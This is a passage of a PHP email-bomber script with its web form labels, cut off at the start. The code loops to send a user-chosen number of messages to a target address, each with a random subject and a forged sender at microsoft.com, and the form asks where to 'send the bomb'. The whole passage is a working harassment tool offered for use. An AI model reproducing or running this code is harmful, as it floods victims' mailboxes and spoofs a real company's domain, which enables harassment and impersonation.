"; } else { die("Invalid emailaddress ($to)"); } for ($i = 1; $i <= $messages; $i++) { $randfrom = rand(100000,900000); $randsubject = rand(100000,900000); mail($to, $randsubject, "$message", "From: $randfrom@microsoft.com"); echo "Sent message # $i (Subject: $randsubject, From: $randfrom@microsoft.com
"; } } ?>
Number of messages
Send the bomb to
Text